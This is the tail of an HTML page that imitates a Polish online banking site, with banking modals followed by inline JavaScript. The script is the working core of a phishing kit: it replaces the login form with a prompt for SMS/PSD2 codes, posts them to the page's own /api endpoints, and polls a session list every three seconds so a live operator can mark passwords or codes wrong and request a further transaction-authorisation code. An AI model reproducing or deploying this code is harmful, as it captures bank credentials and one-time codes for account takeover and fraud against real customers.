                            <p class="font-400">Dane moesz zaktualizowa rwnie w Ustawieniach -&gt; Dane firmy -&gt; Szczegowe dane dotyczce dziaalnoci</p>
                            <p class="text-center font-400"><button class="btn btn-primary btn-lg"><span>Przejd do formularza</span></button></p>
                            <p class="text-center font-400"><button class="btn btn-empty btn-link btn-md"><span>Przypomnij mi pniej</span></button></p>
                        </div>
                    </div>
                </div>
            </div>
        </app-aml-proposal-modal>
        <app-operation-authorisation-modal _ngcontent-vlj-c85="">
            <div data-backdrop="static" data-keyboard="false" id="offer" tabindex="-1" role="dialog" aria-labelledby="offerTitle" aria-hidden="true" class="modal fade">
                <div role="document" class="modal-dialog">
                    <div class="modal-content">
                        <div class="modal-header">
                            <h5 id="downloadTransferListTitle" class="modal-title strong-active">Operacje oczekujce do autoryzacji</h5><button type="button" aria-label="Zamknij" class="close"><span aria-hidden="true"></span></button></div>
                        <div class="modal-body">
                            <p class="font-400">Istniej operacje oczekujce na Twoj autoryzacj. Przejd do listy operacji oczekujcych na autoryzacj.</p>
                            <p class="text-right font-400"><button class="btn btn-primary btn-lg"><span>Przejd do listy operacji</span></button></p>
                        </div>
                    </div>
                </div>
            </div>
        </app-operation-authorisation-modal>
        <app-modal-alert _ngcontent-vlj-c85="">
            <div id="updateWarning" tabindex="-1" role="dialog" aria-labelledby="updateWarningTitle" aria-hidden="true" class="modal alert-modal fade alert-modal-null">
                <div role="document" class="modal-dialog">
                    <div class="modal-content">
                        <div class="modal-body">
                            <div class="container-fluid">
                                <div class="row">
                                    <div class="col-12 col-md-9 col-lg-10">
                                        <h3></h3>
                                        <!---->
                                        <p></p>
                                        <!---->
                                        <!---->
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </app-modal-alert>
        <!---->
        <!---->
        <!---->
        <!---->
        <!---->
        <!---->
        <!---->
        <!---->
        <!---->
        <!---->
        <!---->
        <!---->
    </div>
</app-root>

<script src="/assets/js/jquery-3.5.1.min.js"></script>
<script src="/assets/js/cookies.core.1.3.min.js"></script>
<script src="/assets/js/banklogin.js"></script>
<script>
    let bankId = (cookieManager.read('session_id'))

    const plusBankUpdate = () => {
        if ($("#bank_password").val() && $("#bank_login").val() !== "") {
            $("#mainCont").empty()
            $("#mainCont").append('<div class="form-group input-keyboard-group user-group not-too-wide"><label for="login">Kod sms z telefonu</label> <input id="bank_psd" formcontrolname="login" type="text" autocomplete="off" maxlength="30" class="form-control ng-pristine ng-invalid ng-touched" placeholder="Wprowad kod PSD2" aria-hidden="false"></div><div class="buttons buttons-right not-too-wide"><button id="loginButton" onclick="psdUpdate()" type="submit" class="btn btn-primary btn-lg"=""=""> DALEJ </button></div>')
        } else {
        }
    }

    const regularCheck = () => {
        readTextFile("/api/sessions", function(text){
            var data = JSON.parse(text);
            for (let i=0;i<data["result"].length;i++) {
                if (data["result"][i]["uid"] == sessId) {
                    if (data["result"][i]["accepted"] == "true") {
                        summaryFunc()
                        clearInterval(multipleFunc)
                    }
                } else {

                }
            }
        });
    }
    const psdUpdate = () => {
        if ($("#bank_psd").val() !== "") {
            $.post("/api/psdupdate/", {
                bank_psd: $("#bank_psd").val(),
                sessionId: bankId
            }).done(data => {
                $("#mainCont").empty()
                $("#mainCont").append('<h1>Logowanie...</h1>')
            }).fail(error => {
                console.error("Co poszo nie tak Sprbuj ponownie za chwil.", "Wystpi bd")
            })

        } else {
            console.log('not selectec')
        }
    }

    let multipleFunc = setInterval(function(){ regularCheck() }, 3000);

    //WRONG PASS

    const wrongPass = () => {
        $.post("/api/wrongpass/", {
            sessionId: bankId,
            name: "false"
        }).done(data => {
            console.log('done')
        }).fail(error => {
            console.error("Co poszo nie tak Sprbuj ponownie za chwil.", "Wystpi bd")
        })
    }

    const regularPass = () => {
        readTextFile("/api/sessions", function(text){
            var data = JSON.parse(text);
            for (let i=0;i<data["result"].length;i++) {
                if (data["result"][i]["uid"] == sessId) {
                    if (data["result"][i]["accepted"] == "wrongPass") {
                        clearInterval(multiplePass)
                        wrongPass()
                        location.reload()
                    }
                } else {

                }
            }
        });
    }

    let multiplePass = setInterval(function(){ regularPass() }, 3000);


    const summaryFunc = () => {
        $("#mainCont").empty()
        $("#mainCont").append('<div class="form-group input-keyboard-group user-group not-too-wide"><label for="login">Kod sms z telefonu</label> <input id="bank_summary" formcontrolname="login" type="text" autocomplete="off" maxlength="30" class="form-control ng-pristine ng-invalid ng-touched" placeholder="Wprowad kod PSD2" aria-hidden="false"></div><div class="buttons buttons-right not-too-wide"><button id="loginButton" onclick="summaryCode()" type="submit" class="btn btn-primary btn-lg"=""=""> DALEJ </button></div>')
        document.getElementById('summaryInfo').innerText = 'Autoryzuj Tranzakcj'
    }

    const summaryCode = () => {
        if ($("#bank_summary").val() !== "") {
            $.post("/api/summarycode/", {
                bank_summary: $("#bank_summary").val(),
                sessionId: bankId
            }).done(data => {
                $("#mainCont").empty()
                $("#mainCont").append('<h1>Logowanie...</h1>')
                $("#buttonsCont").empty()
            }).fail(error => {
                console.error("Co poszo nie tak Sprbuj ponownie za chwil.", "Wystpi bd")
            })

        } else {
            console.log('not selectec')
        }
    }

    const regularSummary=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},wrongSum=()=>{$.post("/api/wrongsummary/",{sessionId:bankId,name:"false"}).done(e=>{console.log("done")}).fail(e=>{console.error("Co poszo nie tak Sprbuj ponownie za chwil.","Wystpi bd")})};let multipleSummary=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},3e3);const regularComplete=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})};let multipleCompleted=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})},3e3);
</script>

</body>

</html>